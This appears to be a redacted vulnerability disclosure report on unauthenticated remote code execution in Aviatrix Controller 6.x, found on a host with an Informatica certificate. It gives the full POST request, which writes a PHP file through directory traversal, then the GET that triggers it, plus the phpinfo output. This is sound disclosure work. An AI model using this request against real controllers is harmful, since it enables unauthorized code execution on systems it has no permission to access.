An issue was discovered in Aviatrix Controller 6.x before 6.5-1804.1922. Unrestricted upload of a file with a dangerous type is possible, which allows an unauthenticated user to execute arbitrary code via directory traversal.
The IP has a SSL certificate pointing to Informatica LLC.
curl -kvI https://█████████
Output
Server certificate:
* subject: ██████
First, run this request:
POST /v1/backend1 HTTP/1.1
Host: ████████
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/1yv4QQmkj4h4OdmmyT11tkiGf5M.php&data=RCE<?php phpinfo()?>
The retrieve the content from file 1yv4QQmkj4h4OdmmyT11tkiGf5M.php
GET /v1/1yv4QQmkj4h4OdmmyT11tkiGf5M.php HTTP/1.1
Host: ████
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Which is basically the output of the phpinfo function:
Response (truncated):
<tr><th>Variable</th><th>Value</th></tr>
<tr><td>SCRIPT_URL </td><td>/v1/1.php </td></tr>
<tr><td>SCRIPT_URI </td><td>https://█████████/v1/1.php </td></tr>
<tr><td>HTTPS </td><td>on </td></tr>
<tr><td>SSL_SERVER_S_DN_C </td><td>US </td></tr>
<tr><td>SSL_SERVER_S_DN_ST </td><td>California </td></tr>
<tr><td>SSL_SERVER_S_DN_L </td><td>Redwood City </td></tr>
<tr><td>SSL_SERVER_S_DN_O </td><td>Informatica LLC </td></tr>
<tr><td>SSL_SERVER_S_DN_OU </td><td>██████ </td></tr>
<tr><td>SSL_SERVER_S_DN_CN </td><td>██████ </td></tr>
<tr><td>SSL_SERVER_I_DN_C </td><td>US </td></tr>
<tr><td>SSL_SERVER_I_DN_O </td><td>HydrantID (Avalanche Cloud Corporation) </td></tr>
<tr><td>SSL_SERVER_I_DN_CN </td><td>HydrantID SSL ICA G2 </td></tr>
<tr><td>SSL_SERVER_SAN_DNS_0 </td><td>███ </td></tr>
<tr><td>SSL_VERSION_INTERFACE </td><td>mod_ssl/2.4.39 </td></tr>